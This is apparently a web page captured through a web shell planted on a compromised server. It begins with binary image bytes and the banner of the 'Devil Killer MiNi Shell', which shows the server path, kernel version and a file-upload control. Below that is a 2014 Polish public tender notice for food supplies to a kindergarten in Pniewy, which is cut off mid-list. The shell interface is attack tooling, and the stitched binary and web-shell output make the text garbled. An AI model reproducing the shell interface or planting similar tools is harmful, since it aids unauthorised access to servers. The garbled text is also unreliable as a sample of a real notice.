JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141212/257839-N-2014.html

<p class="kh_header"><b>Pniewy: Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach</b><br>
<b>Numer ogłoszenia: 257839 - 2014; data zamieszczenia: 12.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole "Miś" , ul. Dworcowa 23, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2911216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mis.pniewy.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Gminy Pniewy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tabela  A  WARZYWA I OWOCE
Nazwa artykułu	Jednostka  miary Ilość Marchew luzem kg 120	Pietruszka korzeń kg 50	Rzodkiewka świeża p. pęczek 120 Sałata  szt. 120 Sałata lodowa	szt. 50 Por korzeń kg 50 Cebula biała kg 100 Buraki czerwone kg 200 Seler korzeń kg 100 Jabłka lobo  kg 200 Mandarynki  kg 80 Kiwi  szt. 300 Ziemniaki jadalne kg   3000 Kapusta czerwona świeża  kg 100 Kapusta pekińska  szt. 70 Kalafior świeży  szt. 50 Pomidory luz kg  120 Ogórki szklarniowe kg 120 Ogórki kwaszone luz kg  150 Kapusta kwaszona kg 150 Kapusta biała główka kg kg 200  Pieczarki świeże luz kg  40 Banan kg 100 Papryka konserwowa 0,9l szt. szt. 40 Truskawki kg 60 Papryka świeża  kg 10 Szczypior pęczek 100 Koper świeży pęczek 100 Natka pietruszki p. pęczek 100 Winogrono jasne kg 100 cytryna kg  20			
Tabela B  MIĘSO I PRZETWORY         
Nazwa artykułu	Jedn. miary Ilość Kości od schabu kg 300 Ogonówka wieprzowa wędzona  kg 150 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg 200 Szynka wieprzowa wędzona got. kg 100 Mięso wieprzowe mielone drobne kg  200 Mielonka zapiekana wieprzowa kg 100 Mięso gulaszowe wieprzowe kg 200 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg100 Porcje rosołowe z kurczaka kg150 Kiełbasa wieprzowa gruba kg250 Udka z kurczaka kg150 Karkówka b  k wieprzowa kg150 Kaszanka kg100 Kurczak świeży patroszony do 2kg kg150 Wątróbka wieprzowa kg100 Parówka drobiowa cienka kg200 Kotlet schabowy b k kg150 Pasztet drobiowy kg100 Smalec luz kg50			
Tabela C  MROŻONKI
Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.szt.130	Truskawki mrożone 2,5  kg op.. szt.150	Mieszanka warzywna paski 2,5  kg op. szt. 150 Brokuły mrożone 2,5  kg op.szt.80 Zupa pieczarkowa, 2,5  kg op.szt.100   Zupa kalafiorowa, 2,5  kg op.szt.160 Zupa jarzynowa, 2,5  kg op.szt.160 Kalafior, 2,5  kg op. szt.120 Pyzy drożdżowe op.9szt szt.420  Groszek zielony, 2,5  kg op. szt. 100 Marchew z groszkiem, 2,5  kg op. szt. 100 Wiśnie drążone 2,5  kg op. szt. 40 Maliny 2,5 kg szt.10 Jagody 2,5 kg szt.10 kompotowe szt.150					

Tabela D   PRZETWORY MĄCZNE, INNE
Nazwa artykułu	Jednostka miary Ilość	Mąka pszenna 500  kg 250 Ryż długoziarnisty kg150 Kawa zbożowa (typu inka)150 g  szt.30 Kasza jęczmienna średnia luz kg50 Kasza manna 1kg kg30 Kisiel różne smaki 40 g szt.300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.50 Cukier biały kryształ, paczkowany 1kg szt.800 Syrop wieloowocowy, wysokosłodzony 1l szt. 50 Napoje różne smaki 0.20l kartonik szt. 1200 Krem do smarowania orzech.-czek. 230 g szt. 180 Miód pszczeli nektarowy lipowy 0,4 kg szt. 100 Dżemy różne smaki 0,30 l  wysokosłodzony szt. 80 Kakao naturalne 150 g op. szt. 10 Musztarda sarepska 0,9 kg op. szt. 20 Płatki owsiane 0,5 kg op.szt. 50 Groch połówki luz  kg 50 Fasola sucha luz  kg 40 Koncentrat  pomidorowy 30% 0,9 l szt. 50 Galaretka do ciast różne smaki  0,75g szt  240 Proszek do pieczenia 18g szt. 50 Drożdże piekarskie 100g szt. 70 Ketchup łagodny 500g szt. 30 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 120 Liść laurowy 10g szt.30 Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt. 40 Kwasek cytrynowy spożywczy 20g szt. 40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg	szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml	szt. 50 Groszek zielony puszka 400ml szt. 40 Przecier ogórkowy 0,5 kg op. szt 50 Cynamon 20 g szt. 20 Ziele angielskie 15g szt. 50 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l szt.200 Szprot w pomidorach puszka  170g op. szt. 60 Paprykarz szczecinecki 135g op. szt 60 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l  szt 300 Imbir 20 g szt. 30 Czosnek granulowany 20 g szt. 30 Bazylia 10 g szt. 30 Oregano 10 g szt. 30 herbaty ziołowe 4x30 g - 20 torebek szt. 30 ryż ciemny kg 30 kasza gryczana kg 30 zioła prowasalskie 10 g szt. 30 Herbata granulowana 100g op. szt. 140 Papryka słodka syp. 0,5kgszt.2 Pieprz mielony 0,5 kg szt.4 Przyprawa w płynie 1l szt. 10					
Tabela E   SŁODYCZE
Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op. szt. 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt. 10 Wafle kakaowe  bez czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g szt. 280  Figurki czekoladowe - zajączki 80g szt. 300 Jajka czekoladowe szt. 300 Wafle śmietankowe luz kg 30					

Tabela F  PIECZYWO
Nazwa artykułu	Jedn. miary Ilość Chleb baltonowski 0,6 kg krojony szt. 1600 Chleb razowy 0,5 kg litewski  krojony szt. 500 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg	szt. 600	Pączki szt. 600	Bułka tarta 1 kg	szt. 40 Babka okrągła średnia 0,5kg szt. 120 Drożdżówki szt. 500					

Tabela G     NABIAŁ
Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l  szt. 130 Śmietana zakwaszana 12% 180g szt. 50Twaróg półtłusty 250 g op. szt. 600 Ser homogenizowany  tłusty 200 g  szt 70 Ser salami luz kg 80 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie szt. 2000 Mleko 2% karton 1 l op. szt. 1200 Krążek mix  typu Hochlland 140g trójkąty szt. 80 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50 Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 20 Jogurt smakowy 115g szt. 1500 Śmietanka kremowa 30% 0,5l szt. 30 Margaryna zwykła 250g  szt. 300 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200	
Tabela H   MAKARONY I PRZYPRAWY
Nazwa artykułu	Jednostka miary Ilość Sos pieczeniowy 3 kg.op. szt. 5 Majeranek 0,30kg op. Szt. 5 Delikat do mięs i innych potraw 700g op. szt. 5 Delikat do drobiu 600g op. szt. 3 Makaron drobny gwiazdki 100% pszenicy Durum 5kg kg 60 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 6 Makaron rurki 100% pszenicy Durum 5kg op. szt. 40 Makaron koła 100% pszenicy Durum 5kg op. szt. 40 Makaron łazanki 100% pszenicy Durum 3kg op. szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 30 Koncentrat pomarańczowy 5l szt. 50	
Tabela  I   RYBY
Nazwa towaru Jednostka miary	Ilość Ryby mrożone filet z Pangi kg op. kg 150 Ryby mrożone filet z mintaja kg op. kg150 Ryby wiadro płaty śledziowe ocet 2kg. op.szt.60.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Tabela  A  WARZYWA I OWOCE
Nazwa artykułu	Jednostka  miary Ilość Marchew luzem kg 120	Pietruszka korzeń kg 50	Rzodkiewka świeża p. pęczek 120 Sałata  szt. 120 Sałata lodowa	szt. 50 Por korzeń kg 50 Cebula biała kg 100 Buraki czerwone kg 200 Seler korzeń kg 100 Jabłka lobo  kg 200 Mandarynki  kg 80 Kiwi  szt. 300 Ziemniaki jadalne kg   3000 Kapusta czerwona świeża  kg 100 Kapusta pekińska  szt. 70 Kalafior świeży  szt. 50 Pomidory luz kg  120 Ogórki szklarniowe kg 120 Ogórki kwaszone luz kg  150 Kapusta kwaszona kg 150 Kapusta biała główka kg kg 200  Pieczarki świeże luz kg  40 Banan kg 100 Papryka konserwowa 0,9l szt. szt. 40 Truskawki kg 60 Papryka świeża  kg 10 Szczypior pęczek 100 Koper świeży pęczek 100 Natka pietruszki p. pęczek 100 Winogrono jasne kg 100 cytryna kg  20			
Tabela B  MIĘSO I PRZETWORY         
Nazwa artykułu	Jedn. miary Ilość Kości od schabu kg 300 Ogonówka wieprzowa wędzona  kg 150 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg 200 Szynka wieprzowa wędzona got. kg 100 Mięso wieprzowe mielone drobne kg  200 Mielonka zapiekana wieprzowa kg 100 Mięso gulaszowe wieprzowe kg 200 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg100 Porcje rosołowe z kurczaka kg150 Kiełbasa wieprzowa gruba kg250 Udka z kurczaka kg150 Karkówka b  k wieprzowa kg150 Kaszanka kg100 Kurczak świeży patroszony do 2kg kg150 Wątróbka wieprzowa kg100 Parówka drobiowa cienka kg200 Kotlet schabowy b k kg150 Pasztet drobiowy kg100 Smalec luz kg50			
Tabela C  MROŻONKI
Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.szt.130	Truskawki mrożone 2,5  kg op.. szt.150	Mieszanka warzywna paski 2,5  kg op. szt. 150 Brokuły mrożone 2,5  kg op.szt.80 Zupa pieczarkowa, 2,5  kg op.szt.100   Zupa kalafiorowa, 2,5  kg op.szt.160 Zupa jarzynowa, 2,5  kg op.szt.160 Kalafior, 2,5  kg op. szt.120 Pyzy drożdżowe op.9szt szt.420  Groszek zielony, 2,5  kg op. szt. 100 Marchew z groszkiem, 2,5  kg op. szt. 100 Wiśnie drążone 2,5  kg op. szt. 40 Maliny 2,5 kg szt.10 Jagody 2,5 kg szt.10 kompotowe szt.150					

Tabela D   PRZETWORY MĄCZNE, INNE
Nazwa artykułu	Jednostka miary Ilość	Mąka pszenna 500  kg 250 Ryż długoziarnisty kg150 Kawa zbożowa (typu inka)150 g  szt.30 Kasza jęczmienna średnia luz kg50 Kasza manna 1kg kg30 Kisiel różne smaki 40 g szt.300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.50 Cukier biały kryształ, paczkowany 1kg szt.800 Syrop wieloowocowy, wysokosłodzony 1l szt. 50 Napoje różne smaki 0.20l kartonik szt. 1200 Krem do smarowania orzech.-czek. 230 g szt. 180 Miód pszczeli nektarowy lipowy 0,4 kg szt. 100 Dżemy różne smaki 0,30 l  wysokosłodzony szt. 80 Kakao naturalne 150 g op. szt. 10 Musztarda sarepska 0,9 kg op. szt. 20 Płatki owsiane 0,5 kg op.szt. 50 Groch połówki luz  kg 50 Fasola sucha luz  kg 40 Koncentrat  pomidorowy 30% 0,9 l szt. 50 Galaretka do ciast różne smaki  0,75g szt  240 Proszek do pieczenia 18g szt. 50 Drożdże piekarskie 100g szt. 70 Ketchup łagodny 500g szt. 30 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 120 Liść laurowy 10g szt.30 Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt. 40 Kwasek cytrynowy spożywczy 20g szt. 40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg	szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml	szt. 50 Groszek zielony puszka 400ml szt. 40 Przecier ogórkowy 0,5 kg op. szt 50 Cynamon 20 g szt. 20 Ziele angielskie 15g szt. 50 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l szt.200 Szprot w pomidorach puszka  170g op. szt. 60 Paprykarz szczecinecki 135g op. szt 60 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l  szt 300 Imbir 20 g szt. 30 Czosnek granulowany 20 g szt. 30 Bazylia 10 g szt. 30 Oregano 10 g szt. 30 herbaty ziołowe 4x30 g - 20 torebek szt. 30 ryż ciemny kg 30 kasza gryczana kg 30 zioła prowasalskie 10 g szt. 30 Herbata granulowana 100g op. szt. 140 Papryka słodka syp. 0,5kgszt.2 Pieprz mielony 0,5 kg szt.4 Przyprawa w płynie 1l szt. 10					
Tabela E   SŁODYCZE
Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op. szt. 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt. 10 Wafle kakaowe  bez czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g szt. 280  Figurki czekoladowe - zajączki 80g szt. 300 Jajka czekoladowe szt. 300 Wafle śmietankowe luz kg 30					

Tabela F  PIECZYWO
Nazwa artykułu	Jedn. miary Ilość Chleb baltonowski 0,6 kg krojony szt. 1600 Chleb razowy 0,5 kg litewski  krojony szt. 500 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg	szt. 600	Pączki szt. 600	Bułka tarta 1 kg	szt. 40 Babka okrągła średnia 0,5kg szt. 120 Drożdżówki szt. 500					

Tabela G     NABIAŁ
Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l  szt. 130 Śmietana zakwaszana 12% 180g szt. 50Twaróg półtłusty 250 g op. szt. 600 Ser homogenizowany  tłusty 200 g  szt 70 Ser salami luz kg 80 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie szt. 2000 Mleko 2% karton 1 l op. szt. 1200 Krążek mix  typu Hochlland 140g trójkąty szt. 80 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50 Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 20 Jogurt smakowy 115g szt. 1500 Śmietanka kremowa 30% 0,5l szt. 30 Margaryna zwykła 250g  szt. 300 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200	
Tabela H   MAKARONY I PRZYPRAWY
Nazwa artykułu	Jednostka miary Ilość Sos pieczeniowy 3 kg.op. szt. 5 Majeranek 0,30kg op. Szt. 5 Delikat do mięs i innych potraw 700g op. szt. 5 Delikat do drobiu 600g op. szt. 3 Makaron drobny gwiazdki 100% pszenicy Durum 5kg kg 60 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 6 Makaron rurki 100% pszenicy Durum 5kg op. szt. 40 Makaron koła 100% pszenicy Durum 5kg op. szt. 40 Makaron łazanki 100% pszenicy Durum 3kg op. szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 30 Koncentrat pomarańczowy 5l szt. 50	
Tabela  I   RYBY
Nazwa towaru Jednostka miary	Ilość Ryby mrożone filet z Pangi kg op. kg 150 Ryby mrożone filet z mintaja kg op. kg150 Ryby wiadro płaty śledziowe ocet 2kg. op.szt.60</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

